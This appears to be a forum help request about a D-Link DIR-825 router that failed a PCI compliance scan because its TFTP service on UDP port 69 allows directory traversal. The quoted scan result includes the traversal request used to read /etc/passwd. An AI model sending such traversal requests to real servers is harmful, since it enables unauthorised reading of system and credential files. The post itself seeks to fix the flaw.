I have a business customer who is using a DLink DIR-825 router. Due to the nature of their transaction, the customer needs to be PCI compliant, and is using Security Metrics (securitymetrics.com) to scan their internet port for vulnerabilities.
The security scan has failed for port 69 - UDP for TFTP. Below are the details from the scan result:
Description: TFTP Traversal Arbitrary File Access
Synopsis: The remote TFTP server can be used to read arbitrary files on the remote host
Impact: The TFTP (Trivial File Transfer Protocol) server running on the remote host is vulnerable to a directory traversal attack that allows an attacker to read arbitrary files on the remote host by prepending their names with directory traversal sequences.
Data Received: SecurityMetrics was able to access a system file via the TFTP server using each of the following requests : /etc/passwd ../../../../../../../../../../etc/passwd
Resolution: Disable the remote TFTP daemon, run it in a chrooted environment, or filter incoming traffic to this port.
Risk Factor: High/ CVSS2 Base Score: 10.0
The router has the latest version of firmware/hardware. Last night I went into the advanced settings for the DLink Router, clicked on virtual server, selected port 69 and UDP and selected schedule = Never and Inbound Filter = Deny All
Yet, the security scan has failed.
I am not sure what else should I change/configure on this router in order to disable the TFTP process. It is certainly not needed, so it can be terminated any time.
Any ideas and assistance would be very much appreciated. Thank you.